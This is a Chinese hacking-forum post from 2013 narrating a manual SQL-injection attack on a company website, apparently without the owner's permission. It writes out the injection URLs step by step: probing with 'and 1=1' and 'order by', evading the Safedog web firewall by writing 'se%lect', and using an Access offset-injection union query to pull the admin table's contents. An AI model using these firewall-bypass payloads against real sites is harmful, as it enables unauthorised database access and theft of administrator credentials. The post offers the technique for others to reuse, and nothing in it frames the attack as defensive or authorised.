找回密码
 立即注册
查看: 2352|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。0 X6 }& v: e3 W' d

. v" u# I6 U) R- b
4 ]$ O  O; N; ~顺手加个admin
( x8 ]* I( i) P% g. a4 [( b' S
8 \8 w. Z% B3 m5 H4 U0 w* e- T( K  A5 \- y- O0 Q
默认后台。
; z/ g% C& K) Y$ D: _/ j+ c, A, h回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
& D; y1 ~. P  U; E& W2 R- c
7 f$ y+ T: D4 {: j9 O
6 I4 r% v) m, d/ Q
3 q6 E: C: M6 H" [2 N5 t' z所以就不用御剑扫了,待会直接封IP。# E/ _! A+ t! W  T/ b$ L
( c( ]( {' V7 ^1 C; t9 {6 Q
用order by语句判断是否存在注入。
  w/ F4 w% O% g% ]3 I% J* Mhttp://www.xxx.com /product_show.asp?id=997 order by 1# ~: S5 r* M" j% E
http://www.xxx.com /product_show.asp?id=997 order by 100
1 W5 I1 t; I, E! ^4 Y# n# q6 {# v$ F现在存在注入,经测试后发现是9个字段。+ z# ]( H# q  D  @

  r6 W! O7 J4 T, K接下来进行联合查询,猜是否存在admin表。+ `! M* z+ P& G7 U
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​" n- g; R2 f5 n; F1 Y' [- J
) _- h1 F: W3 b+ d3 C

/ b4 Y) I# m0 l; b* u1 B
, h1 u& K) G9 H9 _/ e5 C8 @" n在select中间加个%,se%lect绕过安全狗。
( B; U4 _- ^  `" H) u+ E: U% G
% N9 h) G" t! ~1 R# L* a- A" y" R  a
发现存在admin表,然后开始手工猜常用的字段。
8 a6 t6 O9 _* ~; Y9 B% k6 x纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。1 k8 q0 N& K" ^  C

  Z- S# n/ r+ l突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
1 z' Y" p( T# O- _$ F 3 A" h( q( v- U
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。7 B8 q) S) |+ F9 E8 k& ~4 \
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
3 Y( }( T, x: ^8 |6 d" D好了,敏感内容出显了。​
  s, G% L3 e4 Y3 I. o& v+ }$ v* E1 {& J, T  J
# C. q' h3 ~6 {3 k( y

& ]3 s1 B) L% x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表